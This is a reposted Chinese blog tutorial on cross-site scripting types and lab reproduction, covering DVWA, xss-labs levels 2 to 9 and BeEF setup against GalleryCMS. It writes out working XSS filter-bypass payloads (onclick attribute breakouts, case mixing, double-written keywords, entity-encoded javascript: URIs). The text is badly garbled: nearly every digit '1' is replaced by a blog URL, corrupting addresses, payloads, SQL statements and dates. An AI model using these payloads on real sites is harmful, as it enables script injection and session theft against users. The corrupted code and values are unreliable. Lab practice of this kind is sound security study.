iis服务器助手广告广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >XSS漏洞总结和漏洞复现
  • 465
分享到

XSS漏洞总结和漏洞复现

xssphp前端 2023-09-28 16:09:52 465人浏览 薄情痞子
摘要

XSS漏洞总结和漏洞复现 XSS漏洞概述:类型一:反射型类型二:存储型类型三:DOM型 复现20字符短域名绕过一、安装BEEFhttps://blog.csdn.net/weixin_45

XSS漏洞总结和漏洞复现

XSS漏洞概述:

跨站脚本攻击XSS(Cross Site Scripting),为区别层叠样式表(Cascading Style Sheets, CSS),所以改写为XSS

类型一:反射

特点:
https://blog.csdn.net/weixin_45492087/article/details/1、非持久型,不保存到正常服务器数据库
2、反射型XSS的被攻击对象是特定的,使用含有反射型XSS的特制URL
案例一:

Http://https://blog.csdn.net/weixin_45492087/article/details/127.0.0.https://blog.csdn.net/weixin_45492087/article/details/1/DVWA-master/vulnerabilities/xss_r/?name=

在这里插入图片描述

类型二:存储型

特点:
https://blog.csdn.net/weixin_45492087/article/details/1、持久型,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性
2、存储型XSS非特定攻击用户,攻击者将存储型XSS代码写进有XSS漏洞的网站上后,只要有用户访问这个链接就会被攻击

类型三:DOM型

特点:
反射型xss和存储型xss会与后台交互,DOM型xss的实现过程都是在前台

DOM(Document Object Model),是一种文档对象模型,DOM通常用于代表在html、XHTML和XML中的对象,使用DOM可以允许程序和脚本动态地访问和更新文档的内容、结构和样式,本质就是一种树状的模型。
DOM型XSS是基于DOM文档对象模型的一种漏洞,所以受客户端浏览器的脚本代码所影响,而不是想前面两种会与服务器交互(不是解析,是交互)。
DOM型XSS是取决于输出的位置,并不取决于输出环境,因此也可以说DOM型XSS既有可能是反射型的,也有可能是存储型的,就是说它的输出点是在DOM位置上。
https://blog.csdn.net/weixin_45492087/article/details/1、
案例一:

http://https://blog.csdn.net/weixin_45492087/article/details/127.0.0.https://blog.csdn.net/weixin_45492087/article/details/1/DVWA-master/vulnerabilities/xss_d/?default=

在这里插入图片描述
案例二:

http://https://blog.csdn.net/weixin_45492087/article/details/127.0.0.https://blog.csdn.net/weixin_45492087/article/details/1/xsslabs/levelhttps://blog.csdn.net/weixin_45492087/article/details/1.PHP?name=hujincheng

在这里插入图片描述

http://https://blog.csdn.net/weixin_45492087/article/details/127.0.0.https://blog.csdn.net/weixin_45492087/article/details/1/xsslabs/levelhttps://blog.csdn.net/weixin_45492087/article/details/1.php?name=或者http://https://blog.csdn.net/weixin_45492087/article/details/127.0.0.https://blog.csdn.net/weixin_45492087/article/details/1/xsslabs/levelhttps://blog.csdn.net/weixin_45492087/article/details/1.php?name=

在这里插入图片描述

复现20字符短域名绕过

一、安装BEEF

https://blog.csdn.net/weixin_45492087/article/details/1、在Kali中运行apt install beef-xss

apt install beef-xss

2、运行beef

beef-xss

3、在浏览器访问

http://https://blog.csdn.net/weixin_45492087/article/details/10.https://blog.csdn.net/weixin_45492087/article/details/1.https://blog.csdn.net/weixin_45492087/article/details/1.https://blog.csdn.net/weixin_45492087/article/details/13:3000/ui/panel

二、安装galleryCMS

*遇到一点小问题

未创建数据库
在这里插入图片描述
解决方法:手动创建

mysql> create database gallerycms;Query OK, https://blog.csdn.net/weixin_45492087/article/details/1 row affected (0.00 sec)

点击注册后弹出错误提示
在这里插入图片描述
在这里插入图片描述

Error Number: https://blog.csdn.net/weixin_45492087/article/details/1364Field 'last_ip' doesn't have a default valueINSERT INTO `user` (`email_address`, `passWord`, `is_active`, `is_admin`, `created_at`, `uuid`, `updated_at`) VALUES ('admin@https://blog.csdn.net/weixin_45492087/article/details/163.com', 'd033e22ae348aeb5660fc2https://blog.csdn.net/weixin_45492087/article/details/140aec35850c4da997', https://blog.csdn.net/weixin_45492087/article/details/1, https://blog.csdn.net/weixin_45492087/article/details/1, '2022-07-28 https://blog.csdn.net/weixin_45492087/article/details/16:25:0https://blog.csdn.net/weixin_45492087/article/details/1', 'c663https://blog.csdn.net/weixin_45492087/article/details/1386-0e4e-https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/1ed-97c4-0a002700000c', '2022-07-28 https://blog.csdn.net/weixin_45492087/article/details/16:25:0https://blog.csdn.net/weixin_45492087/article/details/1')Filename: D:\phpstudy_pro\WWW\GalleryCMS-2.0\system\database\DB_driver.phpLine Number: 330
提示"last_ip"不能为空
解决方法:cmd进入数据库,添加"last_ip"字段,手动插入数据
mysql> use gallerycms;Database changedmysql> INSERT INTO `user` (`email_address`, `password`, `is_active`, `is_admin`, `created_at`, `uuid`, `updated_at`,`last_ip`) VALUES ('admin@https://blog.csdn.net/weixin_45492087/article/details/163.com', 'd033e22ae348aeb5660fc2https://blog.csdn.net/weixin_45492087/article/details/140aec35850c4da997', https://blog.csdn.net/weixin_45492087/article/details/1, https://blog.csdn.net/weixin_45492087/article/details/1, '2022-07-28 https://blog.csdn.net/weixin_45492087/article/details/16:33:https://blog.csdn.net/weixin_45492087/article/details/16', 'ed87d8bb-0e4f-https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/1ed-97c4-0a002700000c', '2022-07-28 https://blog.csdn.net/weixin_45492087/article/details/16:33:https://blog.csdn.net/weixin_45492087/article/details/16','https://blog.csdn.net/weixin_45492087/article/details/127.0.0.https://blog.csdn.net/weixin_45492087/article/details/1');Query OK, https://blog.csdn.net/weixin_45492087/article/details/1 row affected (0.00 sec)

刷新后登录成功进入

在这里插入图片描述

三、开始复现

https://blog.csdn.net/weixin_45492087/article/details/1、创建一个栏目

在这里插入图片描述

2、准备绕过

在这里插入图片描述

2级

http://https://blog.csdn.net/weixin_45492087/article/details/127.0.0.https://blog.csdn.net/weixin_45492087/article/details/1/xsslabs/level2.php?keyword=https://blog.csdn.net/weixin_45492087/article/details/1"onclick="alert(https://blog.csdn.net/weixin_45492087/article/details/1)

在这里插入图片描述
3级

http://https://blog.csdn.net/weixin_45492087/article/details/127.0.0.https://blog.csdn.net/weixin_45492087/article/details/1/xsslabs/level3.php?keyword=https://blog.csdn.net/weixin_45492087/article/details/1'onclick='alert(https://blog.csdn.net/weixin_45492087/article/details/1)

在这里插入图片描述
4级

http://https://blog.csdn.net/weixin_45492087/article/details/127.0.0.https://blog.csdn.net/weixin_45492087/article/details/1/xsslabs/level4.php?keyword=https://blog.csdn.net/weixin_45492087/article/details/1"onclick="alert(https://blog.csdn.net/weixin_45492087/article/details/1)

在这里插入图片描述
5级

http://https://blog.csdn.net/weixin_45492087/article/details/127.0.0.https://blog.csdn.net/weixin_45492087/article/details/1/xsslabs/level5.php?keyword=https://blog.csdn.net/weixin_45492087/article/details/1">https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/1

在这里插入图片描述
6级

大小写未过滤【HTML不区分大小写,HTML->javascript生效】http://https://blog.csdn.net/weixin_45492087/article/details/127.0.0.https://blog.csdn.net/weixin_45492087/article/details/1/xsslabs/level6.php?keyword=https://blog.csdn.net/weixin_45492087/article/details/1"Onclick="alert(https://blog.csdn.net/weixin_45492087/article/details/1)

在这里插入图片描述
7级

【双写过滤处】http://https://blog.csdn.net/weixin_45492087/article/details/127.0.0.https://blog.csdn.net/weixin_45492087/article/details/1/xsslabs/level7.php?keyword=https://blog.csdn.net/weixin_45492087/article/details/1"oonnclick="alert(https://blog.csdn.net/weixin_45492087/article/details/1)

在这里插入图片描述
8级将字符转为ascll码

javascript:alert('https://blog.csdn.net/weixin_45492087/article/details/1')&#https://blog.csdn.net/weixin_45492087/article/details/106;a&#https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/18;a&#https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/15;c&#https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/14;&#https://blog.csdn.net/weixin_45492087/article/details/105;&#https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/12;&#https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/16;:a&#https://blog.csdn.net/weixin_45492087/article/details/108;&#https://blog.csdn.net/weixin_45492087/article/details/10https://blog.csdn.net/weixin_45492087/article/details/1;&#https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/14;&#https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/16;('1'https://blog.csdn.net/weixin_45492087/article/details/1;

在这里插入图片描述
9级跳过过滤(将编码转换ascll)

javascript>>>>>&#https://blog.csdn.net/weixin_45492087/article/details/106;a&#https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/18;a&#https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/15;c&#https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/14;&#https://blog.csdn.net/weixin_45492087/article/details/105;&#https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/12;&#https://blog.csdn.net/weixin_45492087/article/details/1https://blog.csdn.net/weixin_45492087/article/details/16;:alert('https://blog.csdn.net/weixin_45492087/article/details/1')

在这里插入图片描述

来源地址:https://blog.csdn.net/weixin_45492087/article/details/https://blog.csdn.net/weixin_45492087/article/details/1260https://blog.csdn.net/weixin_45492087/article/details/10https://blog.csdn.net/weixin_45492087/article/details/142

--结束END--

本文标题: XSS漏洞总结和漏洞复现

本文链接: https://www.lsjlt.com/news/420261.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • XSS漏洞总结和漏洞复现
    XSS漏洞总结和漏洞复现 XSS漏洞概述:类型一:反射型类型二:存储型类型三:DOM型 复现20字符短域名绕过一、安装BEEFhttps://blog.csdn.net/weixin_45...
    99+
    2023-09-28
    xss php 前端
  • Nacos漏洞总结复现
     Nacos漏洞总结复现 一、Nacos默认key导致权限绕过登陆 0x00 漏洞描述 Nacos中发现影响Nacos {Hostname}}{Hostname}} User-Agent: Moz...
    99+
    2023-10-08
    安全 web安全 网络 java 开发语言
  • 如何修复xss漏洞
    通过在项目中配置xss过滤器修复xss漏洞,具体方法如下:import java.io.IOException;import javax.servlet.Filter;import javax.servlet.FilterChain;imp...
    99+
    2024-04-02
  • java如何修复xss漏洞
    使用Java修复xss漏洞的方法public class XssFilter implements Filter {@Overridepublic void destroy() {}@Overridepublic void doFilter...
    99+
    2024-04-02
  • php怎么修复xss漏洞
    使用php对xss漏洞进行修复,具体方法如下:function search($query, $page){global $db, $bgcolor2, $bgcolor4, $sitename, $io_db, $module_url, ...
    99+
    2024-04-02
  • ewebeditor漏洞利用总结
    为了利用ewebeditor漏洞,攻击者可以利用以下几个常见的方法:1. SQL注入:ewebeditor中存在SQL注入漏洞,攻击...
    99+
    2023-09-20
    ewebeditor
  • Shiro框架漏洞总结
    一、shiro框架简介:      Apache Shiro是一个强大且易用的Java安全框架,能够用于身份验证、授权、加密和会话管理。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。Shiro拥...
    99+
    2023-09-04
    java 安全 开发语言 网络安全
  • Ecshop pages.lbi.php Xss漏洞怎么修复
    小编给大家分享一下Ecshop pages.lbi.php Xss漏洞怎么修复,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!前段...
    99+
    2024-04-02
  • 文件包含漏洞总结
    文件包含漏洞总结 CTF中文件包含漏洞0x01 什么是文件包含漏洞0X02 文件包含漏洞的环境要求0X03 常见文件包含函数0X04 PHP伪协议1、PHP:...
    99+
    2023-09-29
    php 文件包含漏洞
  • CSRF漏洞复现
    目录标题 原理如何实现和xss区别危害CSRF实战(pikachu)dvwa靶场 CSRF(Cross Site Request Forgery)。跨站请求伪造 原理 攻击者会伪造一...
    99+
    2023-09-06
    csrf php 服务器
  • Apache漏洞复现
    目录 1.Apache多后缀解析漏洞复现(apache_parsing_vulnerability)漏洞防御 2.Apache换行解析漏洞复现(CVE-2017-15715)漏洞防御 ...
    99+
    2023-09-01
    apache php 开发语言
  • Nginx漏洞复现
    前言https://blog.csdn.net/weixin_58163202/article/details/ Nginx 是一款轻量级的 Web 服务器、反向代理服务器及电子邮件(IMAP/POP3)代理服务器,并在一个 BSD-li...
    99+
    2023-09-22
    nginx 前端 安全 Powered by 金山文档
  • 怎么防止XSS漏洞
    这篇文章主要介绍了怎么防止XSS漏洞,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。XSS攻击可用于获得对特权信息的访问,本文讲的就是应对它们的方法。美国国土安全部(Depar...
    99+
    2023-06-17
  • 怎么修复反射型xss漏洞
    通过在项目中自定义一个Filter过滤器实现修复反射型xss漏洞,具体方法如下:package com.eastrobot.robotdev.filter;import javax.servlet.*;import javax.servle...
    99+
    2024-04-02
  • phpStudy poc漏洞复现以及漏洞修复办法
    phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响...
    99+
    2023-06-03
  • ZZCMS201910审计——存储XSS漏洞
    ZZCMS201910审计——存储XSS漏洞 在函数集成文件…/inc/function.php中发现如下代码:由此猜测若存在调用此函数的地方,可能会出现sql或者xss注入的存在;下一步应该全局查...
    99+
    2023-09-08
    php 服务器 开发语言
  • [漏洞复现]Thinkphp RCE
    文章目录 简介影响版本复现文件包含目录穿越 修复 简介 Thinkphp 是一款 PHP 框架,如果开启了多语言功能,就可以通过 get、header、cookie 等位置传入参...
    99+
    2023-09-16
    php
  • metasploitable2靶场漏洞总结(部分)
    metasploitable2 端口21vsftpd2.3.4笑脸后门漏洞22弱口令23弱口令25 CNNVD-200111-00453 ISC BIND80 http111 rpcbind1...
    99+
    2023-09-16
    服务器 php ssh metasploitable 安全
  • 漏洞复现 || eGroupWare spellchecker.php 远程命令执行漏洞
    0x01 阅读须知 我爱林的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统...
    99+
    2023-09-07
    php 开发语言 漏洞复现 网络安全 安全
  • 文件上传漏洞总结(全)
    文件上传漏洞 凡是存在上传文件的地方,都有可能存在文件上传漏洞,并不是说有文件上传就一定有文件上传漏洞。 原理 这主要看一些文件上传的代码有没有 严格限制用户上传的文件类型,比如,只可以上传.jpg|.png|.gif文件,但是由于代码不严...
    99+
    2023-10-06
    php 安全 web安全
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作